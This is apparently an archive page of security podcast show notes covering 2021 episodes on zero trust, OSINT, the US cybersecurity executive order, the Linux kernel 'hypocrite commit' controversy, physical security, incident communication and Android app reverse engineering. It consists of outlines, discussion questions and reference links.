- ZTA is less useful if you're not doing basic patching, application updates, and allowing local admin on the system level).
- Not designed with this approach in mind, and often costly to modernize.
- Legacy Systems:
- Where are your assets and how are they used? A “rough estimate” of endpoints is never good enough.
- What are you logging? What AREN’T you logging?
- Asset Management
- Stale accounts, service accounts, HR Workflows for onboarding/offboarding
- Limitations of admin rights
- Local admin/password expiration issues for sales/travelling employees
- User rights auditing
- Human resources/talent
- Politics: Getting support/$$$/Buy-in for retrofitting applications that are “working just fine” is a huge political/business hurdle.
- SaaS/PaaS/etc offerings
What can you move from traditional off-prem solutions to cloud-based services (more up to date, regularly reviewed for security vulnerabilities, offloading responsibility of maintenance, SSO capabilities)
-
- Where to go from here:
- AAA requirements
-
- MFA is a MUST. No, it's not perfect, but it is one more layer in efficacy.
- Identify data owners, make them responsible for RBAC development with technical departments.
- Quantify risk associated with mishandled resources for crown jewels (see previous section on politics).
- Change control around permissions, access
- Security as an active participant in the development/acquisition of new products, software, services, or organizations Like remodeling a house, it is much easier to build security into the process than hire someone to retrofit it later..
- Have discussions around REAL RBAC needs BEFORE implementing a solution. It is easier to expand permissions than it is to take them away. Resist the idea that the easy button of broad stroke permissions is always the right choice.
- What auditing are you doing? Have you baselined behavior? Where are your logs going, and WHO IS RESPONSIBLE FOR REVIEWING THEM.
- Asset Inventory (again)... Then…
-
- HIDS/Firewall
- Patch
- Applocker/Application Controls
- Lather, rinse, repeat.
- It’s hard, it’s time-consuming, and it requires a LOT of support for business unit owners.
- DLP Classification
- Capture metrics, then set KPIs and regular check ins to reduce MTTP/MTTR/MTTD
- MFA is a MUST. No, it's not perfect, but it is one more layer in efficacy.
- Manage the Endpoint: Stop thinking about the perimeter as your weakest point. The endpoint is critical and increasingly vulnerable, mobile, out of traditional “control”. Real time, actionable data and capabilities are critical to remediation and progress.
Would you like to know more?
https://www.beyondtrust.com/blog/entry/why-zero-trust-is-an-unrealistic-security-model
Check out our Store on Teepub! https://brakesec.com/store
Join us on our #Slack Channel! Send a request to @brakesec on Twitter or email [email protected]
#AmazonMusic: https://brakesec.com/amazonmusic
#Spotify: https://brakesec.com/spotifyBDS
#Pandora: https://brakesec.com/pandora
#RSS: https://brakesec.com/BrakesecRSS
#Youtube Channel: http://www.youtube.com/c/BDSPodcast
#iTunes Store Link: https://brakesec.com/BDSiTunes
#Google Play Store: https://brakesec.com/BDS-GooglePlay
Our main site: https://brakesec.com/bdswebsite
#iHeartRadio App: https://brakesec.com/iHeartBrakesec
#SoundCloud: https://brakesec.com/SoundcloudBrakesec
Comments, Questions, Feedback: [email protected]
Support Brakeing Down Security Podcast by using our #Paypal: https://brakesec.com/PaypalBDS OR our #Patreon
https://brakesec.com/BDSPatreon
#Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir
#Player.FM : https://brakesec.com/BDS-PlayerFM
#Stitcher Network: https://brakesec.com/BrakeSecStitcher
#TuneIn Radio App: https://brakesec.com/TuneInBrakesec
Published on: June 6, 20212021-019-Joe Gray, OSINT CTFs, gamifying and motivating to do the right thing
part 2:
CTF OSINT discussion
How people will give additional information, even if they aren't receiving points for it.
Gamifying and motivating people to 'do the right thing', like offering a chance to win a lottery for a covid vaccine, or free sports tickets to get a shot, or gift cards when reporting phishes.
Joe Gray @C_3PJoe
OSINTION
New book… ship date? How to get it?
https://www.amazon.com/Practical-Social-Engineering-Joe-Gray/dp/171850098X/
https://nostarch.com/practical-social-engineering
"Gray provides a very accessible look at social engineering that should be essential reading for pentesters and ethical hackers."
— Ian Barker, BetaNews
Story (Bryan: found my shipmate from the Navy)
Gathering OSINT (what is ethically too far?)
OSINT heartbeat
https://matrix.berkeley.edu/research-article/berkeley-protocol-open-source-investigations/
The OSINTion Discord: https://discord.gg/p78TTGa
stick/carrot interactions https://www.aamc.org/news-insights/dollars-doughnuts-will-incentives-motivate-covid-19-vaccination
How do we motivate or create the desire?
Ohio Covid lottery - https://www.dispatch.com/story/news/2021/05/13/ohio-covid-vaccine-lottery-heres-how-you-can-win/5071370001/
Art sessions with Ms. Berlin
Check out our Store on Teepub! https://brakesec.com/store
Join us on our #Slack Channel! Send a request to @brakesec on Twitter or email [email protected]
#AmazonMusic: https://brakesec.com/amazonmusic
#Spotify: https://brakesec.com/spotifyBDS
#Pandora: https://brakesec.com/pandora
#RSS: https://brakesec.com/BrakesecRSS
#Youtube Channel: http://www.youtube.com/c/BDSPodcast
#iTunes Store Link: https://brakesec.com/BDSiTunes
#Google Play Store: https://brakesec.com/BDS-GooglePlay
Our main site: https://brakesec.com/bdswebsite
#iHeartRadio App: https://brakesec.com/iHeartBrakesec
#SoundCloud: https://brakesec.com/SoundcloudBrakesec
Comments, Questions, Feedback: [email protected]
Support Brakeing Down Security Podcast by using our #Paypal: https://brakesec.com/PaypalBDS OR our #Patreon
https://brakesec.com/BDSPatreon
#Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir
#Player.FM : https://brakesec.com/BDS-PlayerFM
#Stitcher Network: https://brakesec.com/BrakeSecStitcher
#TuneIn Radio App: https://brakesec.com/TuneInBrakesec
Published on: May 28, 20212021-018-LawyerLiz, Pres. Biden's EO, and the clueless professor
Elizabeth Wharton: @lawyerliz on Twitter
Executive Order: (https://www.americanbar.org/groups/public_education/publications/teaching-legal-docs/what-is-an-executive-order-/)
“An executive order is a signed, written, and published directive from the President of the United States that manages operations of the federal government. They are numbered consecutively, so executive orders may be referenced by their assigned number, or their topic. Other presidential documents are sometimes similar to executive orders in their format, formality, and issue, but have different purposes. Proclamations, which are also signed and numbered consecutively, communicate information on holidays, commemorations, federal observances, and trade. Administrative orders—e.g. memos, notices, letters, messages—are not numbered, but are still signed, and are used to manage administrative matters of the federal government. All three types of presidential documents—executive orders, proclamations, and certain administrative orders—are published in the Federal Register, the daily journal of the federal government that is published to inform the public about federal regulations and actions. They are also catalogued by the National Archives as official documents produced by the federal government. Both executive orders and proclamations have the force of law, much like regulations issued by federal agencies, so they are codified under Title 3 of the Code of Federal Regulations, which is the formal collection of all of the rules and regulations issued by the executive branch and other federal agencies.
Executive orders are not legislation; they require no approval from Congress, and Congress cannot simply overturn them. Congress may pass legislation that might make it difficult, or even impossible, to carry out the order, such as removing funding. Only a sitting U.S. President may overturn an existing executive order by issuing another executive order to that effect.”
https://www.whitehouse.gov/briefing-room/presidential-actions/2021/05/12/executive-order-on-improving-the-nations-cybersecurity/
Another Review: https://www.atlanticcouncil.org/blogs/new-atlanticist/markup-our-experts-annotate-bidens-new-executive-order-on-cybersecurity/
https://www.insurancejournal.com/news/national/2021/05/21/615373.htm
Within 60 days of the date of this order, the head of each agency shall:
(i) update existing agency plans to prioritize resources for the adoption and use of cloud technology as outlined in relevant OMB guidance;
(ii) develop a plan to implement Zero Trust Architecture, which shall incorporate, as appropriate, the migration steps that the National Institute of Standards and Technology (NIST) within the Department of Commerce has outlined in standards and guidance, describe any such steps that have already been completed, identify activities that will have the most immediate security impact, and include a schedule to implement them; and
Within 180 days of the date of this order, agencies shall adopt multi-factor authentication and encryption for data at rest and in transit, to the maximum extent consistent with Federal records laws and other applicable laws.
Within 90 days of the date of this order, the Secretary of Homeland Security acting through the Director of CISA, in consultation with the Attorney General, the Director of the FBI, and the Administrator of General Services acting through the Director of FedRAMP, shall establish a framework to collaborate on cybersecurity and incident response activities related to FCEB cloud technology, in order to ensure effective information sharing among agencies and between agencies and CSPs.
SBOM! Dr. Allan Friedman on BrakeSec
http://brakeingsecurity.com/2020-032-dr-allan-friedman-sbom-software-transparency-and-how-the-sausage-is-made-part-2
providing a purchaser a Software Bill of Materials (SBOM) for each product directly or by publishing it on a public website;
(viii) participating in a vulnerability disclosure program that includes a reporting and disclosure process;
(ix) attesting to conformity with secure software development practices
Within 270 days of the date of this order, the Secretary of Commerce acting through the Director of NIST, in coordination with the Chair of the Federal Trade Commission (FTC) and representatives of other agencies as the Director of NIST deems appropriate, shall identify IoT cybersecurity criteria for a consumer labeling program, and shall consider whether such a consumer labeling program may be operated in conjunction with or modeled after any similar existing government programs consistent with applicable law. The criteria shall reflect increasingly comprehensive levels of testing and assessment that a product may have undergone, and shall use or be compatible with existing labeling schemes that manufacturers use to inform consumers about the security of their products. The Director of NIST shall examine all relevant information, labeling, and incentive programs and employ best practices. This review shall focus on ease of use for consumers and a determination of what measures can be taken to maximize manufacturer participation.
Rebuttal to “The Hill article”: https://soatok.blog/2021/05/19/a-balanced-response-to-allen-gwinn/ thank you Brian Harden (@_noid)
Author’s ‘apology’: https://twitter.com/2wiredSecurity/status/1395531110436704258
Check out our Store on Teepub! https://brakesec.com/store
Join us on our #Slack Channel! Send a request to @brakesec on Twitter or email [email protected]
#AmazonMusic: https://brakesec.com/amazonmusic
#Spotify: https://brakesec.com/spotifyBDS
#Pandora: https://brakesec.com/pandora
#RSS: https://brakesec.com/BrakesecRSS
#Youtube Channel: http://www.youtube.com/c/BDSPodcast
#iTunes Store Link: https://brakesec.com/BDSiTunes
#Google Play Store: https://brakesec.com/BDS-GooglePlay
Our main site: https://brakesec.com/bdswebsite
#iHeartRadio App: https://brakesec.com/iHeartBrakesec
#SoundCloud: https://brakesec.com/SoundcloudBrakesec
Comments, Questions, Feedback: [email protected]
Support Brakeing Down Security Podcast by using our #Paypal: https://brakesec.com/PaypalBDS OR our #Patreon
https://brakesec.com/BDSPatreon
#Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir
#Player.FM : https://brakesec.com/BDS-PlayerFM
#Stitcher Network: https://brakesec.com/BrakeSecStitcher
#TuneIn Radio App: https://brakesec.com/TuneInBrakesec
Published on: May 22, 20212021-017-Joe Gray on his future book, the OSINT loop, motivators, and gamification - part1
Joe Gray @C_3PJoe
OSINTION
New book… ship date? How to get it?
https://www.amazon.com/Practical-Social-Engineering-Joe-Gray/dp/171850098X/
https://nostarch.com/practical-social-engineering
"Gray provides a very accessible look at social engineering that should be essential reading for pentesters and ethical hackers."
— Ian Barker, BetaNews
Story (Bryan: found my shipmate from the Navy)
Gathering OSINT (what is ethically too far?)
OSINT heartbeat
https://matrix.berkeley.edu/research-article/berkeley-protocol-open-source-investigations/
The OSINTion Discord: https://discord.gg/p78TTGa
Check out our Store on Teepub! https://brakesec.com/store
Join us on our #Slack Channel! Send a request to @brakesec on Twitter or email [email protected]
#AmazonMusic: https://brakesec.com/amazonmusic
#Spotify: https://brakesec.com/spotifyBDS
#Pandora: https://brakesec.com/pandora
#RSS: https://brakesec.com/BrakesecRSS
#Youtube Channel: http://www.youtube.com/c/BDSPodcast
#iTunes Store Link: https://brakesec.com/BDSiTunes
#Google Play Store: https://brakesec.com/BDS-GooglePlay
Our main site: https://brakesec.com/bdswebsite
#iHeartRadio App: https://brakesec.com/iHeartBrakesec
#SoundCloud: https://brakesec.com/SoundcloudBrakesec
Comments, Questions, Feedback: [email protected]
Support Brakeing Down Security Podcast by using our #Paypal: https://brakesec.com/PaypalBDS OR our #Patreon
https://brakesec.com/BDSPatreon
#Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir
#Player.FM : https://brakesec.com/BDS-PlayerFM
#Stitcher Network: https://brakesec.com/BrakeSecStitcher
#TuneIn Radio App: https://brakesec.com/TuneInBrakesec
Published on: May 18, 20212021-016-researchers knowingly add vulnerable code to linux kernel, @pageinsec joins us to discuss -part2
Updates to the Linux kernel controversy: https://lwn.net/SubscriberLink/854645/334317047842b6c3/
@pageinSec on Twitter
Dan Kaminsky obit: https://www.theregister.com/2021/04/25/dan_kaminsky_obituary/
Spencer Geitzen: http://brakeingsecurity.com/2018-024-pacu-a-tool-for-pentesting-aws-environments
https://en.wikipedia.org/wiki/Milgram_experiment
https://lore.kernel.org/lkml/[email protected]/
https://cse.umn.edu/cs/statement-cse-linux-kernel-research-april-21-2021
https://www.labbott.name/blog/2021/04/21/breakingtrust.html
Seems like a number of patches were added (~190) and each had to be reviewed to ensure badness
https://twitter.com/UMNComputerSci/status/1384948683821694976 response to researchers
Linux Kernel mailing list: https://lore.kernel.org/linux-nfs/YH%2FfM%[email protected]/
https://twitter.com/SarahJamieLewis/status/1384871385537908736
@sarahJamieLewis shows the change they submitted in their paper: https://twitter.com/SarahJamieLewis/status/1384876050207940608
https://twitter.com/SarahJamieLewis/status/1330671897822982144/photo/1
https://twitter.com/SarahJamieLewis/status/1384880034146574341/photo/1
https://web.archive.org/web/20210421145121/https://www-users.cs.umn.edu/~kjlu/papers/crix.pdf (appears the researcher deleted this paper from their site.)
https://web.archive.org/web/20210422144500/https://www-users.cs.umn.edu/~kjlu/papers/clarifications-hc.pdf (researcher deleted this paper from their site.)
“Throughout the study, we honestly did not think this is human research, so we did not apply for an IRB approval in the beginning. We apologize for the raised concerns. This is an important lesson we learned---Do not trust ourselves on determining human research; always refer to IRB whenever a study might be involving any human subjects in any form. We would like to thank the people who suggested us to talk to IRB after seeing the paper abstract.”
https://github.com/QiushiWu/qiushiwu.github.io
NSF Grant application (thank you Page!) https://www.nsf.gov/awardsearch/showAward?AWD_ID=1931208&HistoricalAwards=false
NSF IRB requirements (from 2007): https://www.nsf.gov/pubs/2007/nsf07006/nsf07006.jsp
Might be more recent - Human Subjects | NSF - National Science Foundation
The researchers issued an apology today 25 April: https://lore.kernel.org/lkml/CAK8KejpUVLxmqp026JY7x5GzHU2YJLPU8SzTZUNXU2OXC70ZQQ@mail.gmail.com/ *thanks to Zach Whittacker’s security mailing list..*
Thought provoking question for your show: is it realistically possible for an organization to build and scale a culture of code review that catches malicious insertions through (1) expert analysis; (2) adversarial mindset?
Co-author of : https://www.amazon.com/Building-Secure-Reliable-Systems-Implementing/dp/1492083127
Introduction of bugs (meaningful or otherwise) caused more work for devs.
Revert: https://lkml.org/lkml/2021/4/21/454
Quick overview of using deception in research from Duke’s IRB: Using Deception in Research | Institutional Review Board (duke.edu)
Is this better? Where’s the line on this?
Published on: May 5, 20212021-015-researchers knowingly add vulnerable code to linux kernel, @pageinsec joins us to discuss -part1
@pageinSec on Twitter
Dan Kaminsky obit: https://www.theregister.com/2021/04/25/dan_kaminsky_obituary/
Spencer Geitzen: http://brakeingsecurity.com/2018-024-pacu-a-tool-for-pentesting-aws-environments
https://en.wikipedia.org/wiki/Milgram_experiment
https://lore.kernel.org/lkml/[email protected]/
https://cse.umn.edu/cs/statement-cse-linux-kernel-research-april-21-2021
https://www.labbott.name/blog/2021/04/21/breakingtrust.html
Seems like a number of patches were added (~190) and each had to be reviewed
https://twitter.com/UMNComputerSci/status/1384948683821694976 response to researchers
Linux Kernel mailing list: https://lore.kernel.org/linux-nfs/YH%2FfM%[email protected]/
https://danielmiessler.com/blog/explaining-threats-threat-actors-vulnerabilities-and-risk-using-a-real-world-scenario/
https://twitter.com/SarahJamieLewis/status/1384871385537908736
@sarahJamieLewis shows the change they submitted in their paper: https://twitter.com/SarahJamieLewis/status/1384876050207940608
https://twitter.com/SarahJamieLewis/status/1330671897822982144/photo/1
https://twitter.com/SarahJamieLewis/status/1384880034146574341/photo/1
https://web.archive.org/web/20210421145121/https://www-users.cs.umn.edu/~kjlu/papers/crix.pdf (appears the researcher deleted this paper from their site.)
https://web.archive.org/web/20210422144500/https://www-users.cs.umn.edu/~kjlu/papers/clarifications-hc.pdf (researcher deleted this paper from their site.)
“Throughout the study, we honestly did not think this is human research, so we did not apply for an IRB approval in the beginning. We apologize for the raised concerns. This is an important lesson we learned---Do not trust ourselves on determining human research; always refer to IRB whenever a study might be involving any human subjects in any form. We would like to thank the people who suggested us to talk to IRB after seeing the paper abstract.”
https://github.com/QiushiWu/qiushiwu.github.io
NSF Grant application (thank you Page!) https://www.nsf.gov/awardsearch/showAward?AWD_ID=1931208&HistoricalAwards=false
NSF IRB requirements (from 2007): https://www.nsf.gov/pubs/2007/nsf07006/nsf07006.jsp
Might be more recent - Human Subjects | NSF - National Science Foundation
The researchers issued an apology today 25 April: https://lore.kernel.org/lkml/CAK8KejpUVLxmqp026JY7x5GzHU2YJLPU8SzTZUNXU2OXC70ZQQ@mail.gmail.com/ *thanks to Zach Whittacker’s security mailing list..*
Thought provoking question for your show: is it realistically possible for an organization to build and scale a culture of code review that catches malicious insertions through (1) expert analysis; (2) adversarial mindset?
Co-author of : https://www.amazon.com/Building-Secure-Reliable-Systems-Implementing/dp/1492083127
Introduction of bugs (meaningful or otherwise) caused more work for devs.
Revert list of 190 patches (threaded): https://lkml.org/lkml/2021/4/21/454
Quick overview of using deception in research from Duke’s IRB: Using Deception in Research | Institutional Review Board (duke.edu)
Is this better? Where’s the line on this?
Published on: April 27, 20212021-014-Slipstreaming blocked by Chrome, Slack being used for malware, plus dork and deskjockeys!
https://www.reddit.com/r/netsec/comments/jlu3cf/nat_slipstreaming/
Samy Kamkar - NAT Slipstreaming v2.0
Pwn2Own 2021: Hackers Offered $200,000 for Zoom, Microsoft Teams Exploits | SecurityWeek.Com
https://twitter.com/k8em0/status/1381258155485585409
https://twitter.com/alisaesage/status/1380797761801445376?s=20
infosecCampout 2021
Hackers Who Paint
WWHF Way west
https://pastebin.com/2eYY6trD (for training students)
@lintile
@infosecroleplay
Published on: April 13, 20212021-013-Liana_McCrea-Garrison_Yap-cecil_hotel, Elisa_Lam-physical_security-part2
Reparations.tech
*Public Safety Coordinators
-Field Operations (Road Incidents)
-Specialized Buildings (The Library, Medical Facilities, CCR)
*Public Safety Officers
A. Discuss Training
-SOP Creation
*SOPs are very custom and dependent on the organization. There are no “NIST” standards.
[IN CYBER: Frameworks for Physical Security ---> ]
*Think on your feet, many plans often get thrown out the window.
*Creating policies due to unforeseen incidents
-Physical Security Assessments: Fire Panels, AED, Roof Accesses
*The Checklist: Baseline configuration of the operations for a building
*Locksmith Troubleshooting
*Lack of Funding (Historically) + Ways to Address this In-House
- Situational Awareness
(?) “What is Situational Awareness?”
-There’s a lack of good training to discuss their own physical security
*Ph.Ds leaving car doors wide open, blaming safety officers when they mess up
*Common sense is not so common
*Scenarios don’t always cover every event
*Dead bodies, car accidents, people streaking (lol), medical issues
-Policies can be simple, like opening a car door
*Need to vet whether the person is actually their car
Have you seen both good and bad training on situational awareness? Does it seem to differ between physical and cyber security?
Summary of the Clery Act | Clery Center
“The Clery Act is a consumer protection law that aims to provide transparency around campus crime policy and statistics.
In order to comply with Clery Act requirements, colleges and universities must understand what the law entails, where their responsibilities lie, and what they can do to actively foster campus safety.”
C.Real Life examples of Physical Security Blunders
- Death of Elisa Lam - Wikipedia
- Crime Scene: The Vanishing at the Cecil Hotel - Wikipedia
- STORY: Person called a SOC, asked to get into their car ( but not their vehicle)
- Performing multiple sweeps of common areas to prevent squatting
- Staff “tripping” alarms
- Deceased Faculty + No Sleeping Policy
- Working as a Team
*Escalation Management
*Police are often increase tensions when de-escalation is needed.
*Working as a team
*Locksmith Team + Public Safety Team
*Looking for talent in unexpected places to transfer over to CyberSecurity (Build the Bridge)
Lockpicking Community: [insert folks on twitter / youtube]
- companies heading back to work
- What should IT or Security think about for your businesses that may not have had people in for 6-9 months?
- If companies don’t have cameras or physical controls, should they think about looking at improving?
Connect with Us!
Liana McCrea: @GeecheeThreat (Twitter) + LinkedIn
Garrison Yap: Garrisony75 (Twitter) + LinkedIn
5 Ways IT Managers Can Work with Their Physical Security Counterpart (stanleysecuritysolutions.com)
12 Security Camera System Best Practices – Cyber Safe (een.com)
What is Physical Security? Measures & Planning Guide + PDF (openpath.com)
Check out our Store on Teepub! https://brakesec.com/store
Join us on our #Slack Channel! Send a request to @brakesec on Twitter or email [email protected]
#AmazonMusic: https://brakesec.com/amazonmusic
#Spotify: https://brakesec.com/spotifyBDS
#Pandora: https://brakesec.com/pandora
#RSS: https://brakesec.com/BrakesecRSS
#Youtube Channel: http://www.youtube.com/c/BDSPodcast
#iTunes Store Link: https://brakesec.com/BDSiTunes
#Google Play Store: https://brakesec.com/BDS-GooglePlay
Our main site: https://brakesec.com/bdswebsite
#iHeartRadio App: https://brakesec.com/iHeartBrakesec
#SoundCloud: https://brakesec.com/SoundcloudBrakesec
Comments, Questions, Feedback: [email protected]
Support Brakeing Down Security Podcast by using our #Paypal: https://brakesec.com/PaypalBDS OR our #Patreon
https://brakesec.com/BDSPatreon
#Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir
#Player.FM : https://brakesec.com/BDS-PlayerFM
#Stitcher Network: https://brakesec.com/BrakeSecStitcher
#TuneIn Radio App: https://brakesec.com/TuneInBrakesec
Published on: April 7, 20212021-012-physical security discussion with @geecheethreat and @garrisony75 -pt1
Bios for guests
Reparations.tech
*Public Safety Coordinators
-Field Operations (Road Incidents)
-Specialized Buildings (The Library, Medical Facilities, CCR)
*Public Safety Officers
A. Discuss Training
-SOP Creation
*SOPs are very custom and dependent on the organization. There are no “NIST” standards.
[IN CYBER: Frameworks for Physical Security ---> ]
*Think on your feet, many plans often get thrown out the window.
*Creating policies due to unforeseen incidents
-Physical Security Assessments: Fire Panels, AED, Roof Accesses
*The Checklist: Baseline configuration of the operations for a building
*Locksmith Troubleshooting
*Lack of Funding (Historically) + Ways to Address this In-House
- Situational Awareness
(?) “What is Situational Awareness?”
-There’s a lack of good training to discuss their own physical security
*Ph.Ds leaving car doors wide open, blaming safety officers when they mess up
*Common sense is not so common
*Scenarios don’t always cover every event
*Dead bodies, car accidents, people streaking (lol), medical issues
-Policies can be simple, like opening a car door
*Need to vet whether the person is actually their car
Have you seen both good and bad training on situational awareness? Does it seem to differ between physical and cyber security?
Summary of the Clery Act | Clery Center
“The Clery Act is a consumer protection law that aims to provide transparency around campus crime policy and statistics.
In order to comply with Clery Act requirements, colleges and universities must understand what the law entails, where their responsibilities lie, and what they can do to actively foster campus safety.”
C.Real Life examples of Physical Security Blunders
- Death of Elisa Lam - Wikipedia
- Crime Scene: The Vanishing at the Cecil Hotel - Wikipedia
- STORY: Person called a SOC, asked to get into their car ( but not their vehicle)
- Performing multiple sweeps of common areas to prevent squatting
- Staff “tripping” alarms
- Deceased Faculty + No Sleeping Policy
- Working as a Team
*Escalation Management
*Police are often increase tensions when de-escalation is needed.
*Working as a team
*Locksmith Team + Public Safety Team
*Looking for talent in unexpected places to transfer over to CyberSecurity (Build the Bridge)
Lockpicking Community: [insert folks on twitter / youtube]
- companies heading back to work
- What should IT or Security think about for your businesses that may not have had people in for 6-9 months?
- If companies don’t have cameras or physical controls, should they think about looking at improving?
Connect with Us!
Liana McCrea: @GeecheeThreat (Twitter) + LinkedIn
Garrison Yap: Garrisony75 (Twitter) + LinkedIn
5 Ways IT Managers Can Work with Their Physical Security Counterpart (stanleysecuritysolutions.com)
12 Security Camera System Best Practices – Cyber Safe (een.com)
What is Physical Security? Measures & Planning Guide + PDF (openpath.com)
Published on: March 30, 20212021-011- Dr. Catherine J Ullman, the art of communication in an Incident - Part 2
In this episode:
knowing your audience - discussing the IR impact
how did this happen? how deep do you want to tailor your potential discussion?
Every level must be asking "what, when, why, how?", not just those in the trenches
does the level of incident mean that communication scales accordingly?
And much more!
Dr. Catherine J. Ullman (@investigatorchi)
Incident Response communications
Reminders:
Patreon Jeff T. just became a $2 patron!
Accepted to CircleCityCon on IR communications!
Bsides Rochester Security B-Sides Rochester
Spoke at SeaSec meetups:
Qualys Update on Accellion FTA Security Incident | Qualys Security Blog
Security Advisory | SolarWinds
Family Educational Rights and Privacy Act (FERPA)
It’s important to share necessary information with senior level people and higher ups, but is there a thing as ‘oversharing’?
How do you toe the line between oversharing and nothing at all?
In higher Ed, are you beholden to different disclosure requirements than businesses?
What is Server Side Request Forgery (SSRF)? | Acunetix
13 Beautiful Tools to Create Status Pages for your Business (geekflare.com)
Laying communication groundwork
Status pages (notifying users)
Check out our Store on Teepub! https://brakesec.com/store
Join us on our #Slack Channel! Send a request to @brakesec on Twitter or email [email protected]
#AmazonMusic: https://brakesec.com/amazonmusic
#Spotify: https://brakesec.com/spotifyBDS
#Pandora: https://brakesec.com/pandora
#RSS: https://brakesec.com/BrakesecRSS
#Youtube Channel: http://www.youtube.com/c/BDSPodcast
#iTunes Store Link: https://brakesec.com/BDSiTunes
#Google Play Store: https://brakesec.com/BDS-GooglePlay
Our main site: https://brakesec.com/bdswebsite
#iHeartRadio App: https://brakesec.com/iHeartBrakesec
#SoundCloud: https://brakesec.com/SoundcloudBrakesec
Comments, Questions, Feedback: [email protected]
Support Brakeing Down Security Podcast by using our #Paypal: https://brakesec.com/PaypalBDS OR our #Patreon
https://brakesec.com/BDSPatreon
#Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir
#Player.FM : https://brakesec.com/BDS-PlayerFM
#Stitcher Network: https://brakesec.com/BrakeSecStitcher
#TuneIn Radio App: https://brakesec.com/TuneInBrakesec
Published on: March 21, 20212021-010- Dr. Catherine J Ullman, the art of communication in an Incident - Part 1
Dr. Catherine J. Ullman (@investigatorchi)
Incident Response communications
Reminders:
Patreon Jeff T. just became a $2 patron!
Accepted to CircleCityCon on IR communications!
Bsides Rochester Security B-Sides Rochester
Spoke at SeaSec meetups:
Qualys Update on Accellion FTA Security Incident | Qualys Security Blog
Security Advisory | SolarWinds
Family Educational Rights and Privacy Act (FERPA)
It’s important to share necessary information with senior level people and higher ups, but is there a thing as ‘oversharing’?
How do you toe the line between oversharing and nothing at all?
In higher Ed, are you beholden to different disclosure requirements than businesses?
What is Server Side Request Forgery (SSRF)? | Acunetix
13 Beautiful Tools to Create Status Pages for your Business (geekflare.com)
Laying communication groundwork
Status pages (notifying users)
Check out our Store on Teepub! https://brakesec.com/store
Join us on our #Slack Channel! Send a request to @brakesec on Twitter or email [email protected]
#AmazonMusic: https://brakesec.com/amazonmusic
#Spotify: https://brakesec.com/spotifyBDS
#Pandora: https://brakesec.com/pandora
#RSS: https://brakesec.com/BrakesecRSS
#Youtube Channel: http://www.youtube.com/c/BDSPodcast
#iTunes Store Link: https://brakesec.com/BDSiTunes
#Google Play Store: https://brakesec.com/BDS-GooglePlay
Our main site: https://brakesec.com/bdswebsite
#iHeartRadio App: https://brakesec.com/iHeartBrakesec
#SoundCloud: https://brakesec.com/SoundcloudBrakesec
Comments, Questions, Feedback: [email protected]
Support Brakeing Down Security Podcast by using our #Paypal: https://brakesec.com/PaypalBDS OR our #Patreon
https://brakesec.com/BDSPatreon
#Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir
#Player.FM : https://brakesec.com/BDS-PlayerFM
#Stitcher Network: https://brakesec.com/BrakeSecStitcher
#TuneIn Radio App: https://brakesec.com/TuneInBrakesec
Published on: March 17, 20212021-009-Jasmine_Jackson-TheFluffy007-analyzing_android_apps-FRida-Part2
@thefluffy007
A Bay Area Native (Berkeley)
I always tell people my computer journey started at 14, but it really started at 5th grade (have a good story to tell about this)
Was a bad student in my ninth grade year - almost kicked out of high school due to cutting. Had a 1.7 GPA. After my summer internship turned it around to a 4.0.
Once I graduated from high school, I knew I wanted to continue on the path of computers. Majored in Computer Science
Graduated with Bachelors and Masters in Computer Science. Graduate Certificate in Information Security and Privacy. Minor in Math.
Interested in security from a Yahoo! Group on Cryptography. Liked how you can turn text into gibberish and back again.
Became interested in penetration testing after moving to Charlotte, and moonlighted as a QA while a full-stack developer.
Co-workers did not want me to test their code because I would always find bugs.
Moved into penetration testing space.
Always had an interest in mobile, but never did mobile development and decided it wasn’t for me
Became interested in bug bounties and noticed that mobile payouts were higher.
At this time also completed SANS 575 - Mobile Device Security and Ethical Hacking.
Realized the barrier to entry was VERY (almost non-existent) low in Android as it’s open source.
Started to learn/expand mobile hacking on my own time
The threat exposure is VERY high with mobile hacking. As you have a web app component, network component, and phone component. I always reference a slide from Secure Works.
Link to YouTube Channel → thefluffy007 - YouTube
thefluffy007 – A security researchers thoughts on all things security – web, mobile, and cloud
The Mobile App Security Company | NowSecure
owasp-mstg/Crackmes at master · OWASP/owasp-mstg · GitHub
Rana Android Malware (reversinglabs.com)
These 21 Android Apps Contain Malware | PCMag
Android Tamer -Android Tamer
The Diary of an (Inexperienced) Bug Hunter - Intro to Android Hacking | Bugcrowd
Android Debug Bridge (adb) | Android Developers
Goal: discussing best practices and methods to reverse engineer Android applications
Introduction to Java (w3schools.com)
JavaScript Introduction (w3schools.com)
Introduction to Python (w3schools.com)
Frida • A world-class dynamic instrumentation framework | Inject JavaScript to explore native apps on Windows, macOS, GNU/Linux, iOS, Android, and QNX (Frida can be used with JavaScript, and Python, along with other languages)
GitHub - dweinstein/awesome-frida: Awesome Frida - A curated list of Frida resources http://www.frida.re/ (https://github.com/frida/frida)
Android APK crackme: owasp-mstg/0x05c-Reverse-Engineering-and-Tampering.md at master · OWASP/owasp-mstg · GitHub
Reverse-Engineering - YobiWiki
IntroAndroidSecurity download | SourceForge.net ←- link to my virtual machine and Androidx86 emulator
Background:
**consider this a primer for any class you might teach, a teaser, if you will**
Why do we want to be able to reverse engineer APKs and IPKs?
Android APKS (Android Packages) holds the source code to the application. If you can reverse this you will essentially have the keys to the kingdom. Developers and companies (if they’re proprietary) will add obfuscation - a technique to make the code unreadable to thwart reverse engineers from finding out their code.
What are some of the structures and files contained in APKs that are useful for ppl analyzing binaries?
Android applications have to have a MainActivity (written in Java). This activity is the entry point to the application.
Android applications also have an AndroidManifest.xml file which is the skeleton of the application. This describes the main activity, intents, service providers, permissions, and what Android operating system can run the application.
When testing apps for security, how easy is it to emulate security and physical controls if you’re not on a handset?
Pretty easy. You can use an emulator. I must forewarn though - you will need A LOT of memory for it to work effectively.
Are there ever any times you HAVE to use a handset? An app that tests something like Android’s Safetynet and won’t run without it? Do they ever want perf testing on their apps?
Was thinking about how you check events in logs, battery drain, using apps on older Android/iOS versions?
When organizations or developers ask you to test an app, is there anything in particular in scope? Out of scope?
How do progressive web apps differ than a more traditional app?
Lab setup
IntroToAndroidSecurity VM
Android Emulator
Tools to use
Why use them? (free, full-featured)
Setup and installation
OS-specific tools?
